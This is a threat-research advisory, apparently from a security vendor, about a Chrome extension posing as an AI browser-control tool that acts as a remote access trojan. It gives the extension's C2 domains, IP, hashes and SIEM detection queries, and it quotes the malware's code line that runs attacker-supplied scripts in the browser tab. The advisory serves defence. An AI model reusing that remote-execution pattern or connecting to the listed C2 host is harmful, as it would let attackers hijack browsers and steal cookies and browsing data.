Remote Access Trojan (RAT) Disguised as AI-Based Browser Control Extension

    Friday, February 13, 2026 In: Threat Research Print

    Date: 02/13/2026

    Severity: Medium

    Summary

    The Chrome extension “Chrome MCP Server - AI Browser Control” operates as a browser-based Remote Access Trojan (RAT). It is disguised as an AI automation tool and falsely claims that all processing is 100% local. Once enabled, it connects via WebSocket to a live C2 server. The server assigns sessionId and connectionId values without authentication, enabling structured remote control. It supports 30+ remote commands, including JavaScript execution, traffic interception, screenshots, history access, and cookie-based request replay. Remote code execution is achieved through `new Function("return " + data.params.script)()`, which runs attacker-supplied scripts in the active browser tab.

    Indicators of Compromise (IOC) List

    Domains\URLs:

    wss://mcp-browser.qubecare.ai/chrome

    https://mcp-browser.qubecare.ai/mcp

    mcp-browser.qubecare.ai

    qubecare.ai

    IP Address : 

    162.245.187.98

    Hash : 

    0cbf101e96f6d5c4146812f07105f8b89bd76dd994f540470cd1c4bc37df37d5

    81716da5b6de987436bacae526b4e4a59e80f7f2897d1541716a6d11e2261acd

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    domainname like "wss://mcp-browser.qubecare.ai/chrome" or url like "wss://mcp-browser.qubecare.ai/chrome" or siteurl like "wss://mcp-browser.qubecare.ai/chrome" or domainname like "https://mcp-browser.qubecare.ai/mcp" or url like "https://mcp-browser.qubecare.ai/mcp" or siteurl like "https://mcp-browser.qubecare.ai/mcp" or domainname like "mcp-browser.qubecare.ai" or url like "mcp-browser.qubecare.ai" or siteurl like "mcp-browser.qubecare.ai" or domainname like "qubecare.ai" or url like "qubecare.ai" or siteurl like "qubecare.ai" 

    Detection Query 2 :

    dstipaddress IN ("162.245.187.98") or srcipaddress IN ("162.245.187.98")

    Detection Query 3 :

    sha256hash In ("0cbf101e96f6d5c4146812f07105f8b89bd76dd994f540470cd1c4bc37df37d5","81716da5b6de987436bacae526b4e4a59e80f7f2897d1541716a6d11e2261acd")

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-02-11-IOCs-for-RAT-disguinsed-as-AI-based-browser-extension.txt


    Tags

    MalwareRATAI

    « Previous Article

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2026 by Gurucul - All rights reserved.